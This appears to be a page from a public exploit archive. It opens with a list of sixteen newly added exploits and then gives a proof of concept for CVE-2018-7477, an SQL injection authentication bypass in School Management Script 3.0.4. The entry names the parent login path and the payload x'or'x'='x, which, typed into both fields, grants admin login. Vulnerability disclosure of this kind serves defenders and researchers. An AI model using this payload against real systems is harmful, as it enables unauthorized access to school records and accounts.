
16 changes to exploits/shellcodes Transmission - Integer Overflows Parsing Torrent Files Chrome V8 - 'PropertyArray' Integer Overflow Chrome V8 - 'TranslatedState::MaterializeCapturedObjectAt' Type Confusion Asterisk chan_pjsip 15.2.0 - 'INVITE' Denial of Service Asterisk chan_pjsip 15.2.0 - 'SDP' Denial of Service Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption Microsoft Windows Windows 8.1/2012 R2 - SMB Denial of Service Sony Playstation 4 4.55 FW - Local Kernel GetGo Download Manager 5.3.0.2712 - Buffer Overflow (SEH) Schools Alert Management Script 2.0.2 - Authentication Bypass MyBB My Arcade Plugin 1.3 - Cross-Site Scripting Joomla! Component K2 2.8.0 - Arbitrary File Download School Management Script 3.0.4 - Authentication Bypass CMS Made Simple 2.1.6 - Remote Code Execution Concrete5 < 8.3.0 - Username / Comments Enumeration
20 lines
No EOL
663 B
Text
20 lines
No EOL
663 B
Text
# Exploit Title: SQL Injection exists in PHP Scripts Mall School Management Script 3.0.4.
|
|
# Date: 26/02/2018
|
|
# Exploit Author: Samiran Santra
|
|
# Vendor Homepage: https://www.phpscriptsmall.com
|
|
# Software Link: https://www.phpscriptsmall.com/product/school-management-system
|
|
# Version: v3.0.4
|
|
#Tested on: Windows
|
|
# Website: https://indiancybersecuritysolutions.com/
|
|
# CVE: CVE-2018-7477
|
|
# Category: webapps
|
|
|
|
|
|
Proof of Concept
|
|
|
|
|
|
1.First go to this link- http://localhost/PATH/parents/Parent_module/parent_login.php
|
|
|
|
2.In Username and Password filed just type sql-injection cheat-code (x'or'x'='x)
|
|
|
|
3.Now you can successfully login as a admin user |